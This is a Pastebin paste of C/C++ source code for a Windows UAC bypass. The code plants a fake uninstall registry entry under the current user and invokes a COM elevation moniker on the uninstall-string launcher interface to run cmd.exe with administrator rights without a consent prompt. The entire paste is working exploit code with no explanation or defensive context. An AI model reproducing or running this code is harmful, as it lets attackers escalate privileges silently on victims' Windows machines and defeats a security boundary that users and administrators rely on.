Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "stdafx.h"
- #include <objbase.h>
- #include <Windows.h>
- #include <ntstatus.h>
- #include <CommCtrl.h>
- #include <shlobj.h>
- #include <iostream>
- #include <fci.h>
- #include <fcntl.h>
- #pragma comment(lib,"Ole32.lib")
- #define T_CLSID_UninstallStringLauncher L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"
- #define T_IID_IARPUninstallStringLauncher L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}"
- typedef interface IARPUninstallStringLauncher IARPUninstallStringLauncher;
- typedef struct IARPUninstallStringLauncherVtbl {
- BEGIN_INTERFACE
- HRESULT(STDMETHODCALLTYPE *QueryInterface)(
- __RPC__in IARPUninstallStringLauncher * This,
- __RPC__in REFIID riid,
- _COM_Outptr_ void **ppvObject);
- ULONG(STDMETHODCALLTYPE *AddRef)(
- __RPC__in IARPUninstallStringLauncher * This);
- ULONG(STDMETHODCALLTYPE *Release)(
- __RPC__in IARPUninstallStringLauncher * This);
- HRESULT(STDMETHODCALLTYPE *LaunchUninstallStringAndWait)(
- __RPC__in IARPUninstallStringLauncher * This,
- _In_ HKEY hKey,
- _In_ LPCOLESTR Item,
- _In_ BOOL bModify,
- _In_ HWND hWnd);
- HRESULT(STDMETHODCALLTYPE *RemoveBrokenItemFromInstalledProgramsList)(
- __RPC__in IARPUninstallStringLauncher * This,
- _In_ HKEY hKey,
- _In_ LPCOLESTR Item);
- END_INTERFACE
- } *PIARPUninstallStringLauncherVtbl;
- interface IARPUninstallStringLauncher
- {
- CONST_VTBL struct IARPUninstallStringLauncherVtbl *lpVtbl;
- };
- HRESULT ucmMasqueradedCoGetObjectElevate(_In_ LPWSTR clsid,_In_ DWORD dwClassContext,_In_ REFIID riid,_Outptr_ void **ppv)
- {
- HRESULT r = E_FAIL;
- BIND_OPTS3 bop;
- WCHAR szElevationMoniker[MAX_PATH];
- if (clsid == NULL)
- return r;
- if (_strlen_w(clsid) > 64)
- return r;
- RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
- _strcpy_w(szElevationMoniker, L"Elevation:Administrator!new:");
- _strcat_w(szElevationMoniker, clsid);
- RtlSecureZeroMemory(&bop, sizeof(bop));
- bop.cbStruct = sizeof(bop);
- bop.dwClassContext = dwClassContext;
- return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
- }
- BOOL ucmMasqueradedAPRLaunchFile(
- _In_ LPWSTR lpszFileGuid
- )
- {
- BOOL bCond = FALSE;
- HRESULT r = E_FAIL;
- IID xIID_IARPUninstallStringLauncher;
- CLSID xCLSID_IARPUninstallStringLauncher;
- IARPUninstallStringLauncher *USLauncher = NULL;
- do {
- if (lpszFileGuid == NULL)
- break;
- if (CLSIDFromString(T_CLSID_UninstallStringLauncher, &xCLSID_IARPUninstallStringLauncher) != NOERROR) {
- break;
- }
- if (IIDFromString(T_IID_IARPUninstallStringLauncher, &xIID_IARPUninstallStringLauncher) != S_OK) {
- break;
- }
- r = CoCreateInstance(&xCLSID_IARPUninstallStringLauncher, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &xIID_IARPUninstallStringLauncher, &USLauncher);
- if (r != S_OK)
- break;
- r = ucmMasqueradedCoGetObjectElevate(T_CLSID_UninstallStringLauncher,
- CLSCTX_LOCAL_SERVER, &xIID_IARPUninstallStringLauncher, &USLauncher);
- if (r != S_OK)
- break;
- r = USLauncher->lpVtbl->LaunchUninstallStringAndWait(USLauncher, 0, lpszFileGuid, FALSE, NULL);
- } while (bCond);
- if (USLauncher != NULL) {
- USLauncher->lpVtbl->Release(USLauncher);
- }
- return SUCCEEDED(r);
- }
- BOOL ucmUninstallLauncherMethod(
- _In_ LPWSTR lpszExecutable
- )
- {
- BOOL bResult = FALSE, bCond = FALSE;
- HKEY hKey = NULL;
- LRESULT lResult;
- GUID guid;
- WCHAR szKeyName[MAX_PATH], szGuid[64];
- do {
- if (lpszExecutable == NULL)
- break;
- if (CoCreateGuid(&guid) != S_OK)
- break;
- _strcpy_w(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
- if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
- _strcat_w(szKeyName, szGuid);
- lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
- szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
- if (lResult != ERROR_SUCCESS)
- break;
- lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
- (DWORD)(_strlen_w(lpszExecutable) * sizeof(WCHAR)));
- if (lResult != ERROR_SUCCESS)
- break;
- bResult = ucmMasqueradedAPRLaunchFile(szGuid);
- }
- } while (bCond);
- if (hKey != NULL) {
- RegCloseKey(hKey);
- RegDeleteKey(HKEY_CURRENT_USER, szKeyName);
- }
- return bResult;
- }
- int main()
- {
- int i;
- bool h = ucmUninstallLauncherMethod(L"c:\\windows\\system32\\cmd.exe");
- if (h == TRUE)
- std::cout << "function returned true" << std::endl;
- else
- std::cout << "Function failed you imbicile" << std::endl;
- while (true) {
- i = 0;
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement